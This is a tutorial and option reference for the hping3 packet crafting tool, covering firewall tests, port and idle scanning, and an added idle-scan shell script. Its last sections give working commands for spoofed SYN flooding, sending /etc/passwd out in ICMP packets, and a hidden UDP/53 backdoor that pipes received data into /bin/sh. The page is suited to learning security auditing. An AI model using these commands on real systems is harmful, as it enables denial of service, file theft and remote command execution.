TrumanWong

hping3

Test network and host security

Supplementary instructions

hping is an open-source tool for generating and parsing TCP/IP packets, written by Salvatore Sanfilippo. The current version is hping3, which adds a Tcl scripting interface so its packet API can be driven from scripts. hping is a standard tool for security auditing and firewall testing. Its strength is that every field of a packet can be set by hand, so a target can be probed precisely and in detail.

Install

yum install libpcap-devel tcl-devel
ln -s /usr/include/pcap-bpf.h /usr/include/net/bpf.h
wget http://www.hping.org/hping3-20051105.tar.gz
tar zxvf hping3-20051105.tar.gz
cd hping3-20051105
./configure
make
make install

Options

-h --help Show help.
-V --version Show version information.
-c --count count Stop after sending (and receiving) count packets. After the last packet is sent, hping waits COUNTREACHED_TIMEOUT seconds for replies; the value can be changed in hping2.h.
-i --interval Wait the given time between packets: -i X waits X seconds, -i uX waits X microseconds. The default is one second. This is the main knob for the sending rate, and it also matters for idle/spoofing scans (see the hping HOWTO). --fast is an alias for -i u10000, i.e. 10 packets per second.
-n --numeric Numeric output only; do not resolve host addresses to names.
-q --quiet Quiet output; print only the summary lines at start and end.
-I --interface interface Use the named interface, e.g. eth0.
-v --verbose Verbose output. A TCP reply then looks like: len=46 ip=192.168.1.1 flags=RA DF seq=0 ttl=255 id=0 win=0 rtt=0.4ms tos=0 iplen=40 seq=0 ack=1380893504 sum=2010 urp=0
-D --debug Debug mode. Useful when hping does not behave as you expect; it reports more about interface detection, data-link-layer access, interface settings and so on.
-z --bind Bind Ctrl+Z to the TTL field instead of the destination port, so pressing it at runtime increments the TTL.
-Z --unbind Unbind Ctrl+Z.
-0 --rawip RAW IP mode: hping sends an IP header followed by data; the protocol field is set with --ipproto.
-1 --icmp ICMP mode: hping sends ICMP echo requests. Use --icmptype and --icmpcode to send other types and codes.
-2 --udp UDP mode: by default hping sends UDP packets to port 0 of the target. Use --baseport, --destport and --keep to control the ports.
-9 --listen signature Listen mode: hping waits for packets containing the signature and dumps everything from the end of the signature to the end of the packet.
-a --spoof hostname Spoof the source address. The target's firewall logs the spoofed address rather than yours, but replies go to the spoofed host, so you will not see them unless you can sniff them; egress filtering on your own network may also drop spoofed packets.
-t --ttl ttl Set the TTL of outgoing packets (default 64).
-H --ipproto protocol Set the IP protocol field (RAW IP mode only).
-W --winid Windows systems use a different byte order for the IP id field than UNIX; with this option hping interprets ids the Windows way, which matters for -r and idle scanning against Windows hosts.
-r --rel Display id increments (+N) instead of raw id values. Useful for estimating a host's traffic and for idle scanning; see the HOWTO.
-f --frag Split packets into fragments. This tests the target's fragment reassembly and whether a weak packet filter can be passed with tiny fragments. The default "virtual MTU" is 16 bytes.
-x --morefrag Set the More Fragments flag. The target never receives a final fragment, so when its reassembly timer expires it replies with ICMP time-exceeded-in-reassembly.
-y --dontfrag Set the Don't Fragment flag, which is what path MTU discovery relies on.
-g --fragoff offset Set the fragment offset.
-m --mtu mtu Use a "virtual MTU" other than the default 16 when fragmenting; packets larger than mtu are split.
-G --rroute Include the IP Record Route option and display the route buffer of replies. At most 9 hops fit in the option, and it works even if the host blocks ICMP, because the option rides on whatever packet you send.
-C --icmptype type Set the ICMP type (default echo request).
-K --icmpcode code Set the ICMP code (default 0).
--icmp-ipver Set the IP version of the IP header carried inside the ICMP data (default 4).
--icmp-iphlen Set the header length of that inner IP header (default 5, i.e. five 32-bit words = 20 bytes).
--icmp-iplen Set the total length of the inner IP header (default: the real length).
--icmp-ipid Set the id of the inner IP header (default random).
--icmp-ipproto Set the protocol of the inner IP header (default TCP).
--icmp-cksum Set the ICMP checksum (default: the valid checksum).
--icmp-ts Alias for --icmptype 13 (ICMP timestamp request).
--icmp-addr Alias for --icmptype 17 (ICMP address mask request).
-s --baseport port hping uses the source port to match replies to probes: it starts at a base source port and increments it for each packet sent, so a reply's destination port minus the base gives the probe's sequence number. The default base is random.
-p --destport [+][+]port Set the destination port (default 0). A leading + (e.g. +1024) increments the port for each reply received; ++ (e.g. ++1024) increments it for each packet sent.
-k --keep Keep the source port fixed instead of incrementing it (see --baseport).
-w --win size Set the TCP window size (default 64).
-O --tcpoff offset Set a fake TCP data offset instead of the normal tcphdrlen / 4.
-M --setseq seq Set the TCP sequence number.
-L --setack ack Set the TCP acknowledgement number.
-Q --seqnum Show only the TCP sequence numbers of replies; useful for analysing a host's sequence-number generation.

Typical uses of hping3

hping3 is typically used for the following:

# Firewall test

With hping3 you set each packet field explicitly and test the firewall one case at a time. See http://0daysecurity.com/articles/hping3_examples.html for a worked series.

Typical checks are how the firewall handles ICMP, whether traceroute gets through, whether a given port is open, and how it copes with a denial-of-service load. For example, a LAND attack sets the source address to the target's own address and the source port equal to the destination port, so the target ends up answering itself. Modern TCP/IP stacks discard such packets; the point of the test is whether the firewall drops them before the host sees them. The source port is pinned to 21 with -s 21 -k so that it matches the destination port:

hping3 -S -c 1000000 -a 10.10.10.10 -s 21 -k -p 21 10.10.10.10

# Port scan

hping3 can also scan ports. It lets you set every TCP flag, the packet length and the other header fields. The following probe tests whether port 80 on the target is open:

hping3 -I eth0 -S 192.168.10.1 -p 80

Here -I eth0 selects the interface, -S sets the SYN flag and -p 80 sets the destination port. Read the flags field of the reply line: flags=SA (SYN/ACK) means the port is open, flags=RA (RST/ACK) means it is closed, and no reply at all means a filter dropped the probe or the response. Add -c 1 to send a single probe instead of looping until interrupted.

hping3 offers a very rich set of probe types and covers almost all of nmap's scan techniques except connect scanning, since hping3 only sends and receives packets and never completes a connection. It also has a dedicated scan mode (-8 / --scan) that takes port lists and ranges. Its advantage is precise control over each probe, which makes it easy to fine-tune a test; its scanning speed and result handling do not compare with nmap's, so it is normally used for a handful of ports on a handful of hosts.

# Idle scan

Idle scanning is a way to scan a remote host without ever sending it a packet from your own address. It was also invented by Salvatore Sanfilippo, the author of hping, and is now implemented in nmap as well (-sI).

The principle: find an idle host (a "zombie") that generates no traffic of its own and whose IP id counter increments by one for every packet it sends. The attacker first probes the zombie and records the IP id in its reply. It then sends a SYN to the target port with the source address spoofed as the zombie. If the port is open, the target answers the zombie with a SYN/ACK; the zombie, which never sent a SYN, replies with a RST and so consumes one IP id. If the port is closed the target sends a RST, which the zombie ignores, and if it is filtered nothing arrives at the zombie. The attacker probes the zombie again and compares the two ids: an increment of 2 (one for the zombie's RST, one for the reply to the second probe) means the port is open, an increment of 1 means closed or filtered. The target only ever sees the zombie's address.
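As an added example (not from this page or the hping3 project), the following POSIX shell script pulls together the two interpretation steps from the port scan and idle scan sections: reading the flags of a SYN probe's reply (open, closed or filtered) and turning two IP id readings from the zombie into an idle-scan verdict. The sample reply lines are constructed in hping3's output layout; the syn_probe and idle_scan wrappers at the end run real hping3 commands, need root and a network, and are only invoked when the script is started with --demo. The script name idlescan.sh in the usage note is assumed.

```shell
#!/bin/sh
# Added example, not hping3 project code: interpret hping3 reply lines and
# run the idle-scan arithmetic. Everything above the --demo guard is offline.

# Constructed sample reply lines in hping3's key=value layout.
SAMPLE_OPEN='len=46 ip=192.168.10.1 ttl=64 DF id=0 sport=80 flags=SA seq=0 win=29200 rtt=0.4 ms'
SAMPLE_CLOSED='len=46 ip=192.168.10.1 ttl=64 DF id=0 sport=81 flags=RA seq=0 win=0 rtt=0.3 ms'
SAMPLE_ZOMBIE='len=46 ip=192.168.10.7 ttl=128 id=31337 sport=0 flags=RA seq=0 win=0 rtt=0.5 ms'

# field LINE KEY -> value of KEY=value in a reply line, empty if absent
field() {
    printf '%s\n' "$1" | tr ' ' '\n' | sed -n "s/^$2=//p" | head -n 1
}

# syn_state LINE -> open | closed | filtered
# SYN/ACK back means open, RST back means closed, no reply line (empty
# input, because hping3 printed nothing) means a filter ate the probe.
syn_state() {
    case "$(field "$1" flags)" in
        *S*A*) echo open ;;
        *R*)   echo closed ;;
        *)     echo filtered ;;
    esac
}

# ipid LINE -> the id field, with the '+' that hping3 -r prefixes stripped
ipid() {
    field "$1" id | tr -d '+'
}

# idle_verdict ID_BEFORE ID_AFTER -> what the zombie's counter says.
# Our second probe to the zombie always costs +1; the zombie's RST to an
# unsolicited SYN/ACK from the target costs another +1. Ids are 16-bit,
# so the difference is taken modulo 65536 to survive wrap-around.
idle_verdict() {
    delta=$(( ($2 - $1 + 65536) % 65536 ))
    case $delta in
        2) echo open ;;
        1) echo closed-or-filtered ;;
        *) echo inconclusive ;;   # zombie not idle, or id not incremental
    esac
}

# --- live wrappers (root + network) ---------------------------------------

# syn_probe TARGET PORT -> state from one real SYN probe
syn_probe() {
    syn_state "$(hping3 -c 1 -S -p "$2" "$1" 2>&1 | grep 'ip=' | head -n 1)"
}

# idle_scan ZOMBIE TARGET PORT -> "TARGET:PORT verdict"
idle_scan() {
    zombie=$1; target=$2; port=$3
    before=$(ipid "$(hping3 -c 1 -S -p 80 "$zombie" 2>&1 | grep 'ip=' | head -n 1)")
    # spoofed SYN: the target's answer, if any, lands on the zombie
    hping3 -c 1 -S -a "$zombie" -p "$port" "$target" >/dev/null 2>&1
    sleep 1
    after=$(ipid "$(hping3 -c 1 -S -p 80 "$zombie" 2>&1 | grep 'ip=' | head -n 1)")
    if [ -z "$before" ] || [ -z "$after" ]; then
        echo "no reply from zombie $zombie" >&2
        return 1
    fi
    echo "$target:$port $(idle_verdict "$before" "$after")"
}

if [ "${1:-}" = "--demo" ]; then
    idle_scan "$2" "$3" "$4"
fi
```

Run it as `sh idlescan.sh --demo ZOMBIE TARGET PORT`. Check the zombie first with `hping3 -r -c 5 ZOMBIE`: every reply should show id=+1. A busier host gives larger or irregular increments and idle_verdict reports inconclusive, which is the correct answer rather than a guess; repeat the measurement or pick another zombie.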

# Denial of service attack

hping3 makes it easy to build a denial-of-service flood. For example, to send SYN packets to port 80 of 192.168.10.33 with the source address forged as 192.168.10.99, one packet every 1000 microseconds (1000 packets per second):

hping3 -I eth0 -a 192.168.10.99 -S 192.168.10.33 -p 80 -i u1000

--flood sends as fast as possible without waiting for replies, and --rand-source uses a random source address for each packet. smurf, teardrop, land and similar attacks are just as easy to construct. Keep in mind that spoofed packets are often dropped by egress filtering before they leave your network, and that replies to a spoofed address never reach you.

# File transfer

hping3 can carry a file inside TCP, UDP or ICMP packets, which amounts to a simple covert channel. The receiver runs in listen mode: for every packet that contains a user-chosen signature string it writes out whatever follows the signature, up to the end of the packet. Start the receiving end first (as in the hping man page example, the host argument on the listening side is the sending host):

hping3 192.168.1.159 --listen signature --safe --icmp

It watches incoming ICMP packets for the signature and writes the data that follows it to standard output; redirect that to a file to reassemble the transfer.

On the sending end, put the file into signed ICMP packets:

hping3 192.168.1.108 --icmp -d 100 --sign signature --file /etc/passwd

This sends /etc/passwd to 192.168.1.108 in ICMP packets with a 100-byte data area (-d 100), the first bytes of which hold the signature (--sign signature); the data size must be at least the signature length. --safe on the listener enables hping's retransmission protocol so that lost packets are resent. The transfer is neither encrypted nor authenticated: anyone sniffing the path can read the file, and any host that knows the signature can inject data into the listener.

# Trojan function

If hping3 can be started on a remote host, listen mode piped into a shell works as a crude backdoor, much like netcat's -e option: whatever follows the signature in an incoming packet is handed to the shell and executed.

Example: on the compromised host, wait for UDP packets to port 53 (the DNS port, chosen so the traffic blends in) that carry the signature from 192.168.10.66, and feed the data to /bin/sh.

On the backdoored host:

hping3 192.168.10.66 --listen signature --safe --udp -p 53 | /bin/sh

On the controlling host:

echo ls > test.cmd
hping3 192.168.10.44 -p 53 -d 100 --udp --sign signature --file ./test.cmd

This sends the file containing the ls command, prefixed with the signature, to UDP port 53 of 192.168.10.44 in packets with a 100-byte data area. Two caveats: hping3's listen mode sniffs with libpcap rather than binding a socket, so nothing shows up as listening on UDP/53 in ss or netstat, and anything after the signature is executed without any authentication, whatever its source. Also, the command's output goes to the shell's stdout on the backdoored host, not back to the controller; a usable backdoor would need a second channel to return results.

This is only a demonstration; in practice the controlling side can drive the shell to do far more than run ls.